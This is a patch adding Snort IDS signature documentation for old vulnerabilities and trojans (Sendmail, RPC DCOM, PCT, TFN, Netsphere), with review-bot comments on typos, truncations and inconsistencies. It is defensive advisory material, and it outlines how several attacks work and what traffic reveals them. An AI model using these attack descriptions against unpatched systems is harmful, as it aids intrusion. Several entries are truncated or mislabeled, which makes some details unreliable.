+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
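Review bot: same defects as 2732.txt in this patch: the procedure name is cut from its sentence by a line break ("vulnerability in the procedure comment_on_repgroup" followed by ". This procedure is included in"), "Oracle Oracle9i" repeats the vendor, and headers carry trailing whitespace. Since the two files differ only in the procedure name, generating them from one template would keep the fixes in sync.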
--- /dev/null
+++ b/doc/signatures/2336.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 
+2336
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Verilink NetEngine Broadband Router.
+
+--
+Impact:
+Denial of Service (DoS)
+
+--
+Detailed Information:
+TFTP is used to transfer files between hosts and devices. This event is indicative of spurious
+activity in TFTP traffic between hosts.
+
+It is possible for an attacker to send a NULL opcode to a Verilink
+NetEngine Broadband Router, this may cause the router to become
+unresponsive.
+
+--
+Affected Systems:
+	Verilink NetEngine 6100-4
+
+--
+Attack Scenarios:
+An attacker may use a publicly available exploit script to cause the
+DoS.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
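Review bot: the blank line before "--" after "Upgrade to the latest non-affected version of the software." is missing, unlike the other sections. The first paragraph of Detailed Information ("This event is indicative of spurious activity in TFTP traffic") is generic; the second paragraph (a NULL opcode sent to a Verilink NetEngine) is the actual finding and should lead. Brian Caswell is listed as <brian.caswell@sourcefire.com> here but as <bmc@sourcefire.com> in the other files of this patch; use one address.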
--- /dev/null
+++ b/doc/signatures/2087.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2087
+
+--
+Summary:
+vulnerability in Sendmail.
+
+--
+Impact:
+The remote attacker can gain access to a machine with the credentials of
+the user running the Sendmail daemon, usually 'root'.
+
+--
+Detailed Information:
+A vulnerability exists in the Sendmail MTA Daemon that could allow an
+attacker the opportunity to gain root access.
+
+A programming error exists such that a buffer overflow can be caused
+using the header fields in an SMTP session. Using the '<' and '>'
+characters in the 'from' field, an attacker can increment a counter to
+the extent that the buffer exceeds it's limit.
+
+--
+Affected Systems:
+All systems using Sendmail prior to version 8.12.8
+	
+--
+Attack Scenarios:
+The attacker can craft an email message that contains a "from" header
+with enough sequences of "<>" to cause a counter to exceed it's maximum
+size thus causing the buffer overflow.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+All users of Sendmail should upgrade to the latest non-affected version
+as soon as possible.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-07.html
+http://www.kb.cert.org/vuls/id/398025
+
+CVE Entry
+CAN-2002-1337
+
+Sendmail:
+http://www.sendmail.org/8.12.8.html
+
+--
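Review bot: the Summary is truncated; it reads only "vulnerability in Sendmail." and is missing its opening clause (the other files use "This event is generated when an attempt is made to exploit a known ..."). "it's limit" and "it's maximum size" should be "its". The line after "All systems using Sendmail prior to version 8.12.8" is a tab-only line, and "CVE Entry" lacks the colon used on the other reference headers.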
--- /dev/null
+++ b/doc/signatures/2120.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2120
+
+--
+Summary:
+This event is generated when a remote user uses the IMAP CREATE command
+to send a suspiciously long string to port 143 on an internal server.
+This may indicate an attempt to exploit a buffer overflow vulnerability
+in the IMAP CREATE command in the Alt-N MDaemon IMAP server. This may
+also affect other IMAP implementations.
+
+--
+Impact:
+Remote execution of arbitrary code, which could allow an attacker to
+interfere with or crash mail services. The attacker must have a valid
+IMAP account and must be authenticated by the mail server to attempt
+this exploit.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a buffer overflow
+vulnerability in the Alt-N MDaemon IMAP server CREATE command. If an
+authenticated user creates a folder with a sufficiently long name on the
+Alt-N MDaemon IMAP server, arbitrary commands can be executed with
+system privileges. 
+
+--
+Affected Systems:
+	Alt-N MDaemon 6.7.5 or Alt-N MDaemon 6.7.9 IMAP servers.
+
+--
+Attack Scenarios:
+An authenticated user can create a new folder with a sufficiently long
+name, creating a buffer overflow condition. The attacker can then
+execute arbitrary code with system privileges, which may allow the
+attacker to interfere with or crash mail services.
+
+--
+Ease of Attack:
+Exploits exist, but the user must have an account and be authenticated
+before attempting the exploit.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11577
+
+--
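Review bot: Affected Systems reads "Alt-N MDaemon 6.7.5 or Alt-N MDaemon 6.7.9 IMAP servers.", which implies only those two versions are affected; if the versions between them are also affected, write "6.7.5 through 6.7.9", otherwise make clear these are the tested versions. "Nessus" in Additional References lacks the trailing colon the other reference headers use.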
--- /dev/null
+++ b/doc/signatures/100000678.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000678
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "header.php" using a remote file being passed as the 
+"mod_root" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "mod_root" parameter in the "header.php" script used by 
+the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
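Review bot: as in 100000810.txt, the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host") is credential-check boilerplate unrelated to the remote file include via "mod_root"; drop it. Fix "ona web server" and "attackers choosing". Most lines carry trailing whitespace, the Sid value is not followed by a blank line, and the file ends with an extra blank line.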
--- /dev/null
+++ b/doc/signatures/3187.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3187
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
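Review bot: this file is identical to 3432.txt in this patch apart from the Sid, so it carries the same problems: Attack Scenarios describes "an overly long filename via a network share" while Detailed Information describes a malformed RPC request, and "Expoit" should be "Exploit". If Sids 3187 and 3432 detect different traffic, Detailed Information should say how they differ; if not, the two files should at least be kept in sync.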
--- /dev/null
+++ b/doc/signatures/2529.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2529
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
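Review bot: "attcker" in Attack Scenarios should be "attacker", and the comma in "SSL requests containing an invalid field, sent to vulnerable systems can cause" separates the subject from its verb. Detailed Information says the flaw affects "various software implementations used on Microsoft operating systems" but never names the services or port the rule inspects, which is what an operator needs to tune it. Additional References is empty despite Corrective Action pointing to vendor patches.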
--- /dev/null
+++ b/doc/signatures/100000757.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000757
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "QTO File Manager" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "delete" parameter in the "qtofm.php" script used by the "QTO File Manager" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using QTO File Manager
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
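Review bot: Impact and the second Detailed Information paragraph overstate a cross site scripting bug: "Possible execution of arbitrary code of the attackers choosing" and "execute system binaries" describe server-side code execution, which script injected through the "delete" parameter of "qtofm.php" does not provide. Limit Impact to what XSS actually yields in the victim's browser (stolen session data, actions performed as the user), which is what the Attack Scenarios paragraph already describes. Style: the two leading blank lines before "Rule:" and the missing blank line before the "--" separators after Affected Systems and Contributors deviate from the layout the other files use.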
--- /dev/null
+++ b/doc/signatures/539.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+539
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
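Review bot: nothing in this document says which share name or SMB request sid 539 matches, so the text reads identically to the other generic Samba docs and an analyst cannot tell from it what triggered the alert; name the matched share or pattern in Detailed Information. "None known." under False Positives is doubtful for administrative share access, since legitimate administration and backup tools open these shares routinely; tell the reader to expect hits from authorised management hosts. Fix "adminsitrative" in Attack Scenarios, and fill in Additional References.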
--- /dev/null
+++ b/doc/signatures/100000659.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000659
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "name" parameter in the "guestbook.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
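Review bot: Impact promises "execution of arbitrary code of the attackers choosing" and Detailed Information "execute system binaries", but a script injected through the "name" parameter of "guestbook.php" runs in the visiting user's browser, not on the server; trim Impact to client-side consequences consistent with the Attack Scenarios text about a malicious link. Add the missing blank line before the "--" after Affected Systems and after Contributors.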
--- /dev/null
+++ b/doc/signatures/2285.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2285
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
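Review bot: Detailed Information never identifies the MediaWiki script or request parameter the rule matches, and Additional References is empty, so a reader can verify neither the alert nor the fix; name the affected input and add the vendor advisory. Two wording fixes in the same paragraph: "MediaWiki ." has a stray space before the period, and "This application does not perform stringent checks when handling user input, this may lead to" is a comma splice that should be two sentences. In Affected Systems the vendor name is doubled ("MediaWiki MediaWiki-stable ...").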
--- /dev/null
+++ b/doc/signatures/2528.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2528
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
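Review bot: Additional References is empty for what Summary calls a known PCT vulnerability with a vendor patch; add the Microsoft bulletin that "Apply the appropriate vendor supplied patches" depends on. Fix "compromize" in Detailed Information and "attcker" in Attack Scenarios, and end both Corrective Action lines with periods. "Disable the use of PCT" is the useful mitigation here and should stay first, since it works without the patch.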
--- /dev/null
+++ b/doc/signatures/707.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+707
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
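Review bot: the Affected Systems section is empty, Additional References is empty, and Detailed Information describes no specific weakness, so the "known vulnerability in Microsoft SQL" claimed in Summary is never identified; state which request or authentication behaviour sid 707 matches and which server or client versions it applies to, or reword Summary so it does not promise a specific vulnerability. "Disallow administrative access from sources external to the protected network." is the actionable line in Corrective Action; say that it means filtering the SQL Server listening port, since the doc never names the service port.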
--- /dev/null
+++ b/doc/signatures/100000457.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000457
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "ASP Stats" application running on a webserver. Access to 
+the file "pages.asp" with SQL commands being passed as the "order" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "order" parameter in the "pages.asp" script used by the 
+"ASP Stats" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ASP Stats
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/525.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid: 525
+
+--
+Summary:
+This event is generated when UDP traffic to port 0 is detected. This 
+should not be seen in normal UDP communications.
+
+--
+Impact:
+Denial of Service against Checkpoint Firewall 1 devices. Possible 
+reconnaisance. This may be an attempt to verify the existance 
+of a host or hosts at a particular address or address range.
+
+--
+Detailed Information:
+UDP traffic to port 0 is not valid under normal circumstances.
+
+Certain versions of Checkpoints Firewall 1 are subject to a Denial of 
+Service attack when UDP packets to port 0 are sent via VPN-1.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Any
+
+--
+Attack Scenarios:
+The attacker could send packets to a host with a destination port of 0. 
+The attacker might also be using hping to verify the existance of a host
+as a prelude to an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow UDP traffic to port 0.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0675
+
+--
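Review bot: the third Detailed Information paragraph starts mid-sentence ("an indicator of unauthorized network use, reconnaisance activity or system compromise."): its leading clause was lost, so either restore it ("This may be an indicator of ...") or remove the paragraph. Spelling: "reconnaisance" (twice), "existance" (twice) and "Checkpoints" (possessive). "Sid: 525" is on one line while every other file puts the number on the line below the label. "Disallow UDP traffic to port 0." under Corrective Action is the right, concrete advice and should stay.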
--- /dev/null
+++ b/doc/signatures/3409.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3409
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
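Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share.") does not match Detailed Information, which describes a malformed DCOM request over RPC causing a buffer overflow; either explain how the long filename reaches the RPC interface or rewrite the scenario in terms of the malformed RPC request. Fix "Expoit" in Ease of Attack. Additional References is empty for a vulnerability with a vendor patch; add the Microsoft bulletin. The Corrective Action port list (135, 139 and 445, TCP and UDP) is concrete and useful and should stay.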
--- /dev/null
+++ b/doc/signatures/221.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+221
+
+--
+Summary:
+This event is generated when a host attempts to communicate with a Tribal Flood Network (TFN) DDoS client.
+
+--
+Impact:
+Reconnaissance.  If the listed source IP is in your network, it may be a TFN attacker or it may be probing for another attacker's TFN clients.  If the listed destination IP is in your network, it may be a TFN client. 
+
+--
+Detailed Information:
+The TFN DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, attackers communicate with clients to launch attacks. An attacker may probe for TFN clients using an ICMP echo request with an ICMP identification number of 678 and a string of "1234" in the payload. 
+
+--
+Affected Systems:
+Any TFN compromised host.
+
+--
+Attack Scenarios:
+After a host becomes a TFN client, an attacker may attempt to communicate with it.
+
+--
+Ease of Attack:
+Simple. TFN code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer Stefan Puffer <drsuse@drsuse.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+Arachnids:
+http://www.whitehats.com/info/IDS443
+
+--
--- /dev/null
+++ b/doc/signatures/176.txt
@@ -0,0 +1,95 @@
+Rule:
+
+--
+Sid:
+146
+
+--
+Summary:
+Netsphere is a Trojan Horse offering the attacker access to the victims 
+filesystem, instant messaging clients and some control over peripherals.
+This event is generated when a Netsphere server responds to an attackers
+client.
+
+--
+Impact:
+Compromise of data integrity on the victim host as well as the 
+possibility of rendering the machine temporarily unusable.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Netsphere
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+The Trojan also gives the attacker the ability to access the victims 
+filesystem, turn the monitor on and off, control the mouse, access 
+instant messaging applications and render a pentium based machine 
+unusable.
+
+The Trojan is also known to use TCP ports 30100, 30101 and 30102.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named NetSphereServer.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	NSSX
+
+Removal of this entry is required.
+
+Delete the file NetSphereServer.exe.
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS76
+
+--
